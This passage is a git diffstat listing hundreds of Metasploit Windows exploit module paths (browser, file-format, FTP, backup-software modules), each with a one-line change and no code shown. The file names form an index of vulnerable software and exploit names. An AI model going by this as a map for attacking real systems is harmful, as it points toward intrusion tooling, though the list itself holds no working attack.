+- modules/exploits/windows/antivirus/ams_xfr.rb | 2 +- .../antivirus/symantec_endpoint_manager_rce.rb | 2 +- modules/exploits/windows/antivirus/symantec_iao.rb | 2 +- .../exploits/windows/antivirus/symantec_rtvscan.rb | 2 +- .../antivirus/symantec_workspace_streaming_exec.rb | 2 +- .../windows/antivirus/trendmicro_serverprotect.rb | 2 +- .../trendmicro_serverprotect_createbinding.rb | 2 +- .../trendmicro_serverprotect_earthagent.rb | 2 +- modules/exploits/windows/arkeia/type77.rb | 2 +- .../windows/backdoor/energizer_duo_payload.rb | 2 +- .../exploits/windows/backupexec/name_service.rb | 2 +- .../exploits/windows/backupexec/remote_agent.rb | 2 +- .../exploits/windows/brightstor/ca_arcserve_342.rb | 2 +- .../exploits/windows/brightstor/discovery_tcp.rb | 2 +- .../exploits/windows/brightstor/discovery_udp.rb | 2 +- .../windows/brightstor/etrust_itm_alert.rb | 2 +- modules/exploits/windows/brightstor/hsmserver.rb | 2 +- modules/exploits/windows/brightstor/lgserver.rb | 2 +- .../exploits/windows/brightstor/lgserver_multi.rb | 2 +- .../windows/brightstor/lgserver_rxrlogin.rb | 2 +- .../lgserver_rxssetdatagrowthscheduleandfilter.rb | 2 +- .../brightstor/lgserver_rxsuselicenseini.rb | 2 +- modules/exploits/windows/brightstor/license_gcr.rb | 2 +- .../exploits/windows/brightstor/mediasrv_sunrpc.rb | 2 +- .../exploits/windows/brightstor/message_engine.rb | 2 +- .../windows/brightstor/message_engine_72.rb | 2 +- .../windows/brightstor/message_engine_heap.rb | 2 +- modules/exploits/windows/brightstor/sql_agent.rb | 2 +- modules/exploits/windows/brightstor/tape_engine.rb | 2 +- .../windows/brightstor/tape_engine_0x8a.rb | 2 +- .../exploits/windows/brightstor/universal_agent.rb | 2 +- .../windows/browser/adobe_cooltype_sing.rb | 2 +- .../exploits/windows/browser/adobe_flash_avm2.rb | 2 +- .../browser/adobe_flash_casi32_int_overflow.rb | 2 +- .../adobe_flash_copy_pixels_to_byte_array.rb | 2 +- .../browser/adobe_flash_domain_memory_uaf.rb | 2 +- .../browser/adobe_flash_filters_type_confusion.rb | 2 +- .../windows/browser/adobe_flash_mp4_cprt.rb | 2 +- .../windows/browser/adobe_flash_otf_font.rb | 2 +- .../exploits/windows/browser/adobe_flash_pcre.rb | 2 +- .../windows/browser/adobe_flash_regex_value.rb | 2 +- .../exploits/windows/browser/adobe_flash_rtmp.rb | 2 +- .../exploits/windows/browser/adobe_flash_sps.rb | 2 +- .../adobe_flash_uncompress_zlib_uninitialized.rb | 2 +- .../browser/adobe_flash_worker_byte_array_uaf.rb | 2 +- .../browser/adobe_flashplayer_arrayindexing.rb | 2 +- .../windows/browser/adobe_flashplayer_avm.rb | 2 +- .../windows/browser/adobe_flashplayer_flash10o.rb | 2 +- .../browser/adobe_flashplayer_newfunction.rb | 2 +- .../browser/adobe_flatedecode_predictor02.rb | 2 +- modules/exploits/windows/browser/adobe_geticon.rb | 2 +- .../exploits/windows/browser/adobe_jbig2decode.rb | 2 +- .../windows/browser/adobe_media_newplayer.rb | 2 +- .../browser/adobe_shockwave_rcsl_corruption.rb | 2 +- .../exploits/windows/browser/adobe_toolbutton.rb | 2 +- .../exploits/windows/browser/adobe_utilprintf.rb | 2 +- .../browser/advantech_webaccess_dvs_getcolor.rb | 2 +- modules/exploits/windows/browser/aim_goaway.rb | 2 +- .../windows/browser/aladdin_choosefilepath_bof.rb | 2 +- modules/exploits/windows/browser/amaya_bdo.rb | 2 +- .../windows/browser/aol_ampx_convertfile.rb | 2 +- .../windows/browser/aol_icq_downloadagent.rb | 2 +- .../windows/browser/apple_itunes_playlist.rb | 2 +- .../browser/apple_quicktime_marshaled_punk.rb | 2 +- .../windows/browser/apple_quicktime_mime_type.rb | 2 +- .../windows/browser/apple_quicktime_rdrf.rb | 2 +- .../windows/browser/apple_quicktime_rtsp.rb | 2 +- .../windows/browser/apple_quicktime_smil_debug.rb | 2 +- .../browser/apple_quicktime_texml_font_table.rb | 2 +- .../exploits/windows/browser/ask_shortformat.rb | 2 +- .../windows/browser/asus_net4switch_ipswcom.rb | 2 +- .../browser/athocgov_completeinstallation.rb | 2 +- modules/exploits/windows/browser/autodesk_idrop.rb | 2 +- .../windows/browser/aventail_epi_activex.rb | 2 +- .../windows/browser/awingsoft_web3d_bof.rb | 2 +- .../windows/browser/awingsoft_winds3d_sceneurl.rb | 2 +- .../browser/baofeng_storm_onbeforevideodownload.rb | 2 +- modules/exploits/windows/browser/barcode_ax49.rb | 2 +- .../browser/blackice_downloadimagefileurl.rb | 2 +- .../browser/c6_messenger_downloaderactivex.rb | 2 +- .../windows/browser/ca_brightstor_addcolumn.rb | 2 +- .../windows/browser/chilkat_crypt_writefile.rb | 2 +- .../windows/browser/cisco_anyconnect_exec.rb | 2 +- .../windows/browser/cisco_playerpt_setsource.rb | 2 +- .../browser/cisco_playerpt_setsource_surl.rb | 2 +- .../windows/browser/citrix_gateway_actx.rb | 2 +- .../exploits/windows/browser/clear_quest_cqole.rb | 2 +- .../windows/browser/communicrypt_mail_activex.rb | 2 +- .../browser/creative_software_cachefolder.rb | 2 +- .../browser/crystal_reports_printcontrol.rb | 2 +- .../windows/browser/dell_webcam_crazytalk.rb | 2 +- .../windows/browser/dxstudio_player_exec.rb | 2 +- .../windows/browser/ea_checkrequirements.rb | 2 +- .../browser/ebook_flipviewer_fviewerloading.rb | 2 +- .../windows/browser/enjoysapgui_comp_download.rb | 2 +- .../browser/enjoysapgui_preparetoposthtml.rb | 2 +- .../windows/browser/facebook_extractiptc.rb | 2 +- .../windows/browser/foxit_reader_plugin_url_bof.rb | 2 +- .../windows/browser/getgodm_http_response_bof.rb | 2 +- modules/exploits/windows/browser/gom_openurl.rb | 2 +- modules/exploits/windows/browser/greendam_url.rb | 2 +- .../browser/honeywell_hscremotedeploy_exec.rb | 2 +- .../windows/browser/honeywell_tema_exec.rb | 2 +- .../browser/hp_alm_xgo_setshapenodetype_exec.rb | 2 +- .../browser/hp_easy_printer_care_xmlcachemgr.rb | 2 +- .../hp_easy_printer_care_xmlsimpleaccessor.rb | 2 +- .../windows/browser/hp_loadrunner_addfile.rb | 2 +- .../windows/browser/hp_loadrunner_addfolder.rb | 2 +- .../browser/hp_loadrunner_writefilebinary.rb | 2 +- .../browser/hp_loadrunner_writefilestring.rb | 2 +- .../exploits/windows/browser/hpmqc_progcolor.rb | 2 +- .../windows/browser/hyleos_chemviewx_activex.rb | 2 +- .../exploits/windows/browser/ibm_spss_c1sizer.rb | 2 +- .../windows/browser/ibm_tivoli_pme_activex_bof.rb | 2 +- .../windows/browser/ibmegath_getxmlvalue.rb | 2 +- .../browser/ibmlotusdomino_dwa_uploadmodule.rb | 2 +- modules/exploits/windows/browser/ie_cbutton_uaf.rb | 2 +- .../windows/browser/ie_cgenericelement_uaf.rb | 2 +- .../exploits/windows/browser/ie_createobject.rb | 2 +- .../exploits/windows/browser/ie_execcommand_uaf.rb | 2 +- .../windows/browser/ie_iscomponentinstalled.rb | 2 +- .../windows/browser/ie_setmousecapture_uaf.rb | 2 +- .../windows/browser/ie_unsafe_scripting.rb | 2 +- .../browser/imgeviewer_tifmergemultifiles.rb | 2 +- .../indusoft_issymbol_internationalseparator.rb | 2 +- .../exploits/windows/browser/inotes_dwa85w_bof.rb | 2 +- .../windows/browser/intrust_annotatex_add.rb | 2 +- .../windows/browser/java_basicservice_impl.rb | 2 +- modules/exploits/windows/browser/java_cmm.rb | 2 +- .../windows/browser/java_codebase_trust.rb | 2 +- .../exploits/windows/browser/java_docbase_bof.rb | 2 +- .../windows/browser/java_mixer_sequencer.rb | 2 +- .../windows/browser/java_ws_arginject_altjvm.rb | 2 +- .../windows/browser/java_ws_double_quote.rb | 2 +- modules/exploits/windows/browser/java_ws_vmargs.rb | 2 +- .../windows/browser/juniper_sslvpn_ive_setupdll.rb | 2 +- .../exploits/windows/browser/kazaa_altnet_heap.rb | 2 +- .../windows/browser/keyhelp_launchtripane_exec.rb | 2 +- .../windows/browser/logitechvideocall_start.rb | 2 +- modules/exploits/windows/browser/lpviewer_url.rb | 2 +- .../browser/macrovision_downloadandexecute.rb | 2 +- .../exploits/windows/browser/macrovision_unsafe.rb | 2 +- .../windows/browser/malwarebytes_update_exec.rb | 2 +- .../windows/browser/maxthon_history_xcs.rb | 2 +- .../windows/browser/mcafee_mcsubmgr_vsprintf.rb | 2 +- .../exploits/windows/browser/mcafee_mvt_exec.rb | 2 +- .../browser/mcafeevisualtrace_tracetarget.rb | 2 +- modules/exploits/windows/browser/mirc_irc_url.rb | 2 +- .../windows/browser/mozilla_attribchildremoved.rb | 2 +- .../browser/mozilla_firefox_onreadystatechange.rb | 2 +- .../browser/mozilla_firefox_xmlserializer.rb | 2 +- .../windows/browser/mozilla_interleaved_write.rb | 2 +- .../exploits/windows/browser/mozilla_mchannel.rb | 2 +- .../exploits/windows/browser/mozilla_nssvgvalue.rb | 2 +- .../windows/browser/mozilla_nstreerange.rb | 2 +- .../windows/browser/mozilla_reduceright.rb | 2 +- .../windows/browser/ms03_020_ie_objecttype.rb | 2 +- .../exploits/windows/browser/ms05_054_onload.rb | 2 +- .../windows/browser/ms06_001_wmf_setabortproc.rb | 2 +- .../windows/browser/ms06_013_createtextrange.rb | 2 +- .../windows/browser/ms06_055_vml_method.rb | 2 +- .../windows/browser/ms06_057_webview_setslice.rb | 2 +- .../exploits/windows/browser/ms06_067_keyframe.rb | 2 +- .../exploits/windows/browser/ms06_071_xml_core.rb | 2 +- .../browser/ms07_017_ani_loadimage_chunksize.rb | 2 +- .../windows/browser/ms08_041_snapshotviewer.rb | 2 +- .../windows/browser/ms08_053_mediaencoder.rb | 2 +- .../browser/ms08_070_visual_studio_msmask.rb | 2 +- .../windows/browser/ms08_078_xml_corruption.rb | 2 +- .../windows/browser/ms09_002_memory_corruption.rb | 2 +- .../windows/browser/ms09_043_owc_htmlurl.rb | 2 +- .../exploits/windows/browser/ms09_043_owc_msdso.rb | 2 +- .../windows/browser/ms09_072_style_object.rb | 2 +- .../exploits/windows/browser/ms10_002_aurora.rb | 2 +- .../exploits/windows/browser/ms10_002_ie_object.rb | 2 +- .../windows/browser/ms10_018_ie_behaviors.rb | 2 +- .../windows/browser/ms10_018_ie_tabular_activex.rb | 2 +- .../browser/ms10_022_ie_vbscript_winhlp32.rb | 2 +- .../windows/browser/ms10_026_avi_nsamplespersec.rb | 2 +- .../browser/ms10_042_helpctr_xss_cmd_exec.rb | 2 +- .../browser/ms10_046_shortcut_icon_dllloader.rb | 2 +- .../windows/browser/ms10_090_ie_css_clip.rb | 2 +- .../windows/browser/ms11_003_ie_css_import.rb | 2 +- .../browser/ms11_050_mshtml_cobjectelement.rb | 2 +- .../exploits/windows/browser/ms11_081_option.rb | 2 +- modules/exploits/windows/browser/ms11_093_ole32.rb | 2 +- modules/exploits/windows/browser/ms12_004_midi.rb | 2 +- .../windows/browser/ms12_037_ie_colspan.rb | 2 +- .../exploits/windows/browser/ms12_037_same_id.rb | 2 +- .../windows/browser/ms13_009_ie_slayoutrun_uaf.rb | 2 +- .../browser/ms13_022_silverlight_script_object.rb | 2 +- .../windows/browser/ms13_037_svg_dashstyle.rb | 2 +- .../exploits/windows/browser/ms13_055_canchor.rb | 2 +- .../windows/browser/ms13_059_cflatmarkuppointer.rb | 2 +- modules/exploits/windows/browser/ms13_069_caret.rb | 2 +- .../windows/browser/ms13_080_cdisplaypointer.rb | 2 +- .../browser/ms13_090_cardspacesigninhelper.rb | 2 +- .../windows/browser/ms14_012_cmarkup_uaf.rb | 2 +- .../exploits/windows/browser/ms14_012_textrange.rb | 2 +- .../windows/browser/ms14_064_ole_code_execution.rb | 2 +- modules/exploits/windows/browser/msvidctl_mpeg2.rb | 2 +- .../windows/browser/mswhale_checkforupdates.rb | 2 +- .../browser/msxml_get_definition_code_exec.rb | 2 +- .../browser/nctaudiofile2_setformatlikesample.rb | 2 +- .../exploits/windows/browser/nis2004_antispam.rb | 2 +- modules/exploits/windows/browser/nis2004_get.rb | 2 +- .../windows/browser/notes_handler_cmdinject.rb | 2 +- .../browser/novell_groupwise_gwcls1_actvx.rb | 2 +- .../windows/browser/novelliprint_callbackurl.rb | 2 +- .../windows/browser/novelliprint_datetime.rb | 2 +- .../windows/browser/novelliprint_executerequest.rb | 2 +- .../browser/novelliprint_executerequest_dbg.rb | 2 +- .../browser/novelliprint_getdriversettings.rb | 2 +- .../browser/novelliprint_getdriversettings_2.rb | 2 +- .../windows/browser/novelliprint_target_frame.rb | 2 +- .../windows/browser/ntr_activex_check_bof.rb | 2 +- .../windows/browser/ntr_activex_stopmodule.rb | 2 +- .../browser/oracle_autovue_setmarkupmode.rb | 2 +- .../windows/browser/oracle_dc_submittoexpress.rb | 2 +- .../browser/oracle_webcenter_checkoutandopen.rb | 2 +- .../exploits/windows/browser/orbit_connecting.rb | 2 +- .../windows/browser/ovftool_format_string.rb | 2 +- modules/exploits/windows/browser/pcvue_func.rb | 2 +- .../windows/browser/persits_xupload_traversal.rb | 2 +- modules/exploits/windows/browser/quickr_qp2_bof.rb | 2 +- .../windows/browser/real_arcade_installerdlg.rb | 2 +- .../windows/browser/realplayer_cdda_uri.rb | 2 +- .../exploits/windows/browser/realplayer_console.rb | 2 +- .../exploits/windows/browser/realplayer_import.rb | 2 +- modules/exploits/windows/browser/realplayer_qcp.rb | 2 +- .../exploits/windows/browser/realplayer_smil.rb | 2 +- .../exploits/windows/browser/roxio_cineplayer.rb | 2 +- .../exploits/windows/browser/safari_xslt_output.rb | 2 +- .../browser/samsung_neti_wiewer_backuptoavi_bof.rb | 2 +- .../browser/sapgui_saveviewtosessionfile.rb | 2 +- .../browser/siemens_solid_edge_selistctrlx.rb | 2 +- .../windows/browser/softartisans_getdrivename.rb | 2 +- .../windows/browser/sonicwall_addrouteentry.rb | 2 +- ...ymantec_altirisdeployment_downloadandinstall.rb | 2 +- .../browser/symantec_altirisdeployment_runcmd.rb | 2 +- .../windows/browser/symantec_appstream_unsafe.rb | 2 +- .../browser/symantec_backupexec_pvcalendar.rb | 2 +- .../symantec_consoleutilities_browseandsavefile.rb | 2 +- .../browser/synactis_connecttosynactis_bof.rb | 2 +- .../browser/systemrequirementslab_unsafe.rb | 2 +- modules/exploits/windows/browser/teechart_pro.rb | 2 +- .../windows/browser/tom_sawyer_tsgetx71ex552.rb | 2 +- .../windows/browser/trendmicro_extsetowner.rb | 2 +- .../windows/browser/trendmicro_officescan.rb | 2 +- .../windows/browser/tumbleweed_filetransfer.rb | 2 +- .../windows/browser/ubisoft_uplay_cmd_exec.rb | 2 +- .../windows/browser/ultramjcam_openfiledig_bof.rb | 2 +- .../windows/browser/ultraoffice_httpupload.rb | 2 +- .../exploits/windows/browser/verypdf_pdfview.rb | 2 +- .../windows/browser/viscom_movieplayer_drawtext.rb | 2 +- modules/exploits/windows/browser/vlc_amv.rb | 2 +- modules/exploits/windows/browser/vlc_mms_bof.rb | 2 +- .../windows/browser/webdav_dll_hijacker.rb | 2 +- .../windows/browser/webex_ucf_newobject.rb | 2 +- .../wellintech_kingscada_kxclientdownload.rb | 2 +- .../windows/browser/winamp_playlist_unc.rb | 2 +- .../exploits/windows/browser/winamp_ultravox.rb | 2 +- .../windows/browser/windvd7_applicationtype.rb | 2 +- .../exploits/windows/browser/winzip_fileview.rb | 2 +- modules/exploits/windows/browser/wmi_admintools.rb | 2 +- .../browser/x360_video_player_set_text_bof.rb | 2 +- modules/exploits/windows/browser/xmplay_asx.rb | 2 +- .../windows/browser/yahoomessenger_fvcom.rb | 2 +- .../windows/browser/yahoomessenger_server.rb | 2 +- .../browser/zenturiprogramchecker_unsafe.rb | 2 +- .../windows/browser/zenworks_helplauncher_exec.rb | 2 +- modules/exploits/windows/dcerpc/ms03_026_dcom.rb | 2 +- modules/exploits/windows/dcerpc/ms05_017_msmq.rb | 2 +- .../windows/dcerpc/ms07_029_msdns_zonename.rb | 2 +- modules/exploits/windows/dcerpc/ms07_065_msmq.rb | 2 +- .../email/ms07_017_ani_loadimage_chunksize.rb | 2 +- .../windows/email/ms10_045_outlook_ref_only.rb | 2 +- .../windows/email/ms10_045_outlook_ref_resolve.rb | 2 +- modules/exploits/windows/emc/alphastor_agent.rb | 2 +- .../windows/emc/alphastor_device_manager_exec.rb | 2 +- .../windows/emc/networker_format_string.rb | 2 +- .../windows/emc/replication_manager_exec.rb | 2 +- .../windows/fileformat/a_pdf_wav_to_mp3.rb | 2 +- .../exploits/windows/fileformat/abbs_amp_lst.rb | 2 +- .../windows/fileformat/acdsee_fotoslate_string.rb | 2 +- modules/exploits/windows/fileformat/acdsee_xpm.rb | 2 +- .../windows/fileformat/actfax_import_users_bof.rb | 2 +- .../windows/fileformat/activepdf_webgrabber.rb | 2 +- .../windows/fileformat/adobe_collectemailinfo.rb | 2 +- .../windows/fileformat/adobe_cooltype_sing.rb | 2 +- .../windows/fileformat/adobe_flashplayer_button.rb | 2 +- .../fileformat/adobe_flashplayer_newfunction.rb | 2 +- .../fileformat/adobe_flatedecode_predictor02.rb | 2 +- .../exploits/windows/fileformat/adobe_geticon.rb | 2 +- .../fileformat/adobe_illustrator_v14_eps.rb | 2 +- .../windows/fileformat/adobe_jbig2decode.rb | 2 +- .../exploits/windows/fileformat/adobe_libtiff.rb | 2 +- .../windows/fileformat/adobe_media_newplayer.rb | 2 +- .../windows/fileformat/adobe_pdf_embedded_exe.rb | 2 +- .../fileformat/adobe_pdf_embedded_exe_nojs.rb | 2 +- .../windows/fileformat/adobe_reader_u3d.rb | 2 +- .../windows/fileformat/adobe_toolbutton.rb | 2 +- .../windows/fileformat/adobe_u3d_meshdecl.rb | 2 +- .../windows/fileformat/adobe_utilprintf.rb | 2 +- .../windows/fileformat/allplayer_m3u_bof.rb | 2 +- .../windows/fileformat/altap_salamander_pdb.rb | 2 +- .../windows/fileformat/aol_desktop_linktag.rb | 2 +- .../exploits/windows/fileformat/aol_phobos_bof.rb | 2 +- .../windows/fileformat/apple_quicktime_pnsize.rb | 2 +- .../windows/fileformat/apple_quicktime_rdrf.rb | 2 +- .../windows/fileformat/apple_quicktime_texml.rb | 2 +- .../exploits/windows/fileformat/audio_coder_m3u.rb | 2 +- .../exploits/windows/fileformat/audio_wkstn_pls.rb | 2 +- .../exploits/windows/fileformat/audiotran_pls.rb | 2 +- .../windows/fileformat/audiotran_pls_1424.rb | 2 +- .../windows/fileformat/aviosoft_plf_buf.rb | 2 +- modules/exploits/windows/fileformat/bacnet_csv.rb | 2 +- .../windows/fileformat/beetel_netconfig_ini_bof.rb | 2 +- .../windows/fileformat/blazedvd_hdtv_bof.rb | 2 +- .../exploits/windows/fileformat/blazedvd_plf.rb | 2 +- .../windows/fileformat/bpftp_client_bps_bof.rb | 2 +- .../exploits/windows/fileformat/bsplayer_m3u.rb | 2 +- modules/exploits/windows/fileformat/ca_cab.rb | 2 +- .../windows/fileformat/cain_abel_4918_rdp.rb | 2 +- .../windows/fileformat/ccmplayer_m3u_bof.rb | 2 +- .../windows/fileformat/chasys_draw_ies_bmp_bof.rb | 2 +- .../windows/fileformat/coolpdf_image_stream_bof.rb | 2 +- .../windows/fileformat/corelpdf_fusion_bof.rb | 2 +- .../windows/fileformat/csound_getnum_bof.rb | 2 +- modules/exploits/windows/fileformat/cutezip_bof.rb | 2 +- .../windows/fileformat/cyberlink_p2g_bof.rb | 2 +- .../windows/fileformat/cytel_studio_cy3.rb | 2 +- .../exploits/windows/fileformat/deepburner_path.rb | 2 +- .../windows/fileformat/destinymediaplayer16.rb | 2 +- .../windows/fileformat/digital_music_pad_pls.rb | 2 +- .../windows/fileformat/djstudio_pls_bof.rb | 2 +- .../exploits/windows/fileformat/djvu_imageurl.rb | 2 +- .../exploits/windows/fileformat/dvdx_plf_bof.rb | 2 +- .../windows/fileformat/easycdda_pls_bof.rb | 2 +- .../windows/fileformat/emc_appextender_keyworks.rb | 2 +- .../windows/fileformat/erdas_er_viewer_bof.rb | 2 +- .../fileformat/erdas_er_viewer_rf_report_error.rb | 2 +- .../fileformat/esignal_styletemplate_bof.rb | 2 +- .../exploits/windows/fileformat/etrust_pestscan.rb | 2 +- .../exploits/windows/fileformat/ezip_wizard_bof.rb | 2 +- .../exploits/windows/fileformat/fatplayer_wav.rb | 2 +- modules/exploits/windows/fileformat/fdm_torrent.rb | 2 +- .../exploits/windows/fileformat/feeddemon_opml.rb | 2 +- .../windows/fileformat/foxit_reader_filewrite.rb | 2 +- .../windows/fileformat/foxit_reader_launch.rb | 2 +- .../exploits/windows/fileformat/foxit_title_bof.rb | 2 +- .../windows/fileformat/free_mp3_ripper_wav.rb | 2 +- .../windows/fileformat/galan_fileformat_bof.rb | 2 +- modules/exploits/windows/fileformat/gsm_sim.rb | 2 +- modules/exploits/windows/fileformat/gta_samp.rb | 2 +- .../windows/fileformat/hhw_hhp_compiledfile_bof.rb | 2 +- .../windows/fileformat/hhw_hhp_contentfile_bof.rb | 2 +- .../windows/fileformat/hhw_hhp_indexfile_bof.rb | 2 +- modules/exploits/windows/fileformat/homm3_h3m.rb | 2 +- .../windows/fileformat/ht_mp3player_ht3_bof.rb | 2 +- .../fileformat/ibm_forms_viewer_fontname.rb | 2 +- modules/exploits/windows/fileformat/ibm_pcm_ws.rb | 2 +- modules/exploits/windows/fileformat/icofx_bof.rb | 2 +- .../windows/fileformat/ideal_migration_ipj.rb | 2 +- .../windows/fileformat/iftp_schedule_bof.rb | 2 +- .../windows/fileformat/irfanview_jpeg2000_bof.rb | 2 +- .../windows/fileformat/ispvm_xcf_ispxcf.rb | 2 +- .../windows/fileformat/kingview_kingmess_kvl.rb | 2 +- .../exploits/windows/fileformat/lattice_pac_bof.rb | 2 +- .../exploits/windows/fileformat/lotusnotes_lzh.rb | 2 +- .../windows/fileformat/magix_musikmaker_16_mmm.rb | 2 +- .../fileformat/mcafee_hercules_deletesnapshot.rb | 2 +- .../windows/fileformat/mcafee_showreport_exec.rb | 2 +- .../exploits/windows/fileformat/mediacoder_m3u.rb | 2 +- .../exploits/windows/fileformat/mediajukebox.rb | 2 +- modules/exploits/windows/fileformat/microp_mppl.rb | 2 +- .../windows/fileformat/millenium_mp3_pls.rb | 2 +- .../windows/fileformat/mini_stream_pls_bof.rb | 2 +- .../windows/fileformat/mjm_coreplayer2011_s3m.rb | 2 +- .../windows/fileformat/mjm_quickplayer_s3m.rb | 2 +- .../windows/fileformat/moxa_mediadbplayback.rb | 2 +- .../exploits/windows/fileformat/mplayer_m3u_bof.rb | 2 +- .../windows/fileformat/mplayer_sami_bof.rb | 2 +- .../fileformat/ms09_067_excel_featheader.rb | 2 +- .../windows/fileformat/ms10_004_textbytesatom.rb | 2 +- .../windows/fileformat/ms10_038_excel_obj_bof.rb | 2 +- .../fileformat/ms10_087_rtf_pfragments_bof.rb | 2 +- .../fileformat/ms11_006_createsizeddibsection.rb | 2 +- .../windows/fileformat/ms11_021_xlb_bof.rb | 2 +- modules/exploits/windows/fileformat/ms12_005.rb | 2 +- .../windows/fileformat/ms12_027_mscomctl_bof.rb | 2 +- .../exploits/windows/fileformat/ms13_071_theme.rb | 2 +- .../exploits/windows/fileformat/ms14_017_rtf.rb | 2 +- .../windows/fileformat/ms14_060_sandworm.rb | 2 +- .../windows/fileformat/ms14_064_packager_python.rb | 2 +- .../fileformat/ms14_064_packager_run_as_admin.rb | 2 +- .../fileformat/ms15_020_shortcut_icon_dllloader.rb | 2 +- .../windows/fileformat/ms15_100_mcl_exe.rb | 2 +- .../windows/fileformat/ms_visual_basic_vbp.rb | 2 +- .../windows/fileformat/mswin_tiff_overflow.rb | 2 +- .../fileformat/msworks_wkspictureinterface.rb | 2 +- .../exploits/windows/fileformat/mymp3player_m3u.rb | 2 +- modules/exploits/windows/fileformat/netop.rb | 2 +- .../fileformat/nuance_pdf_launch_overflow.rb | 2 +- .../exploits/windows/fileformat/openoffice_ole.rb | 2 +- .../fileformat/orbit_download_failed_bof.rb | 2 +- .../windows/fileformat/orbital_viewer_orb.rb | 2 +- .../windows/fileformat/ovf_format_string.rb | 2 +- .../windows/fileformat/proshow_cellimage_bof.rb | 2 +- .../windows/fileformat/proshow_load_bof.rb | 2 +- .../exploits/windows/fileformat/publishit_pui.rb | 2 +- .../windows/fileformat/real_networks_netzip_bof.rb | 2 +- .../fileformat/real_player_url_property_bof.rb | 2 +- .../fileformat/realplayer_ver_attribute_bof.rb | 2 +- .../fileformat/safenet_softremote_groupname.rb | 2 +- modules/exploits/windows/fileformat/sascam_get.rb | 2 +- .../exploits/windows/fileformat/scadaphone_zip.rb | 2 +- .../fileformat/shadow_stream_recorder_bof.rb | 2 +- .../exploits/windows/fileformat/somplplayer_m3u.rb | 2 +- .../fileformat/subtitle_processor_m3u_bof.rb | 2 +- .../windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb | 2 +- .../fileformat/total_video_player_ini_bof.rb | 2 +- modules/exploits/windows/fileformat/tugzip.rb | 2 +- .../exploits/windows/fileformat/ultraiso_ccd.rb | 2 +- .../exploits/windows/fileformat/ultraiso_cue.rb | 2 +- .../exploits/windows/fileformat/ursoft_w32dasm.rb | 2 +- modules/exploits/windows/fileformat/varicad_dwb.rb | 2 +- .../windows/fileformat/videocharge_studio.rb | 2 +- .../exploits/windows/fileformat/videolan_tivo.rb | 2 +- .../windows/fileformat/videospirit_visprj.rb | 2 +- .../exploits/windows/fileformat/visio_dxf_bof.rb | 2 +- .../windows/fileformat/visiwave_vwr_type.rb | 2 +- .../exploits/windows/fileformat/vlc_modplug_s3m.rb | 2 +- .../exploits/windows/fileformat/vlc_realtext.rb | 2 +- modules/exploits/windows/fileformat/vlc_smb_uri.rb | 2 +- modules/exploits/windows/fileformat/vlc_webm.rb | 2 +- .../exploits/windows/fileformat/vuplayer_cue.rb | 2 +- .../exploits/windows/fileformat/vuplayer_m3u.rb | 2 +- .../windows/fileformat/watermark_master.rb | 2 +- .../exploits/windows/fileformat/winamp_maki_bof.rb | 2 +- .../windows/fileformat/winrar_name_spoofing.rb | 2 +- .../windows/fileformat/wireshark_mpeg_overflow.rb | 2 +- .../windows/fileformat/wireshark_packet_dect.rb | 2 +- .../windows/fileformat/wm_downloader_m3u.rb | 2 +- .../windows/fileformat/xenorate_xpl_bof.rb | 2 +- .../exploits/windows/fileformat/xion_m3u_sehbof.rb | 2 +- .../windows/fileformat/xradio_xrl_sehbof.rb | 2 +- .../windows/fileformat/zinfaudioplayer221_pls.rb | 2 +- .../exploits/windows/firewall/blackice_pam_icq.rb | 2 +- modules/exploits/windows/firewall/kerio_auth.rb | 2 +- .../exploits/windows/ftp/32bitftp_list_reply.rb | 2 +- modules/exploits/windows/ftp/3cdaemon_ftp_user.rb | 2 +- modules/exploits/windows/ftp/aasync_list_reply.rb | 2 +- .../exploits/windows/ftp/ability_server_stor.rb | 2 +- .../exploits/windows/ftp/absolute_ftp_list_bof.rb | 2 +- modules/exploits/windows/ftp/bison_ftp_bof.rb | 2 +- modules/exploits/windows/ftp/cesarftp_mkd.rb | 2 +- modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb | 2 +- modules/exploits/windows/ftp/dreamftp_format.rb | 2 +- .../exploits/windows/ftp/easyfilesharing_pass.rb | 2 +- modules/exploits/windows/ftp/easyftp_cwd_fixret.rb | 2 +- .../exploits/windows/ftp/easyftp_list_fixret.rb | 2 +- modules/exploits/windows/ftp/easyftp_mkd_fixret.rb | 2 +- .../exploits/windows/ftp/filecopa_list_overflow.rb | 2 +- .../windows/ftp/filewrangler_list_reply.rb | 2 +- modules/exploits/windows/ftp/freefloatftp_user.rb | 2 +- modules/exploits/windows/ftp/freefloatftp_wbem.rb | 2 +- modules/exploits/windows/ftp/freeftpd_pass.rb | 2 +- modules/exploits/windows/ftp/freeftpd_user.rb | 2 +- .../exploits/windows/ftp/ftpgetter_pwd_reply.rb | 2 +- modules/exploits/windows/ftp/ftppad_list_reply.rb | 2 +- .../exploits/windows/ftp/ftpshell51_pwd_reply.rb | 2 +- .../exploits/windows/ftp/ftpsynch_list_reply.rb | 2 +- .../exploits/windows/ftp/gekkomgr_list_reply.rb | 2 +- .../exploits/windows/ftp/globalscapeftp_input.rb | 2 +- modules/exploits/windows/ftp/goldenftp_pass_bof.rb | 2 +- .../exploits/windows/ftp/httpdx_tolog_format.rb | 2 +- modules/exploits/windows/ftp/kmftp_utility_cwd.rb | 2 +- modules/exploits/windows/ftp/leapftp_list_reply.rb | 2 +- modules/exploits/windows/ftp/leapftp_pasv_reply.rb | 2 +- modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb | 2 +- .../exploits/windows/ftp/netterm_netftpd_user.rb | 2 +- modules/exploits/windows/ftp/odin_list_reply.rb | 2 +- modules/exploits/windows/ftp/open_ftpd_wbem.rb | 2 +- .../exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb | 2 +- .../windows/ftp/oracle9i_xdb_ftp_unlock.rb | 2 +- modules/exploits/windows/ftp/pcman_stor.rb | 2 +- modules/exploits/windows/ftp/proftp_banner.rb | 2 +- .../windows/ftp/quickshare_traversal_write.rb | 2 +- modules/exploits/windows/ftp/ricoh_dl_bof.rb | 2 +- modules/exploits/windows/ftp/sami_ftpd_list.rb | 2 +- modules/exploits/windows/ftp/sami_ftpd_user.rb | 2 +- modules/exploits/windows/ftp/sasser_ftpd_port.rb | 2 +- modules/exploits/windows/ftp/scriptftp_list.rb | 2 +- modules/exploits/windows/ftp/seagull_list_reply.rb | 2 +- modules/exploits/windows/ftp/servu_chmod.rb | 2 +- modules/exploits/windows/ftp/servu_mdtm.rb | 2 +- .../exploits/windows/ftp/slimftpd_list_concat.rb | 2 +- .../exploits/windows/ftp/trellian_client_pasv.rb | 2 +- 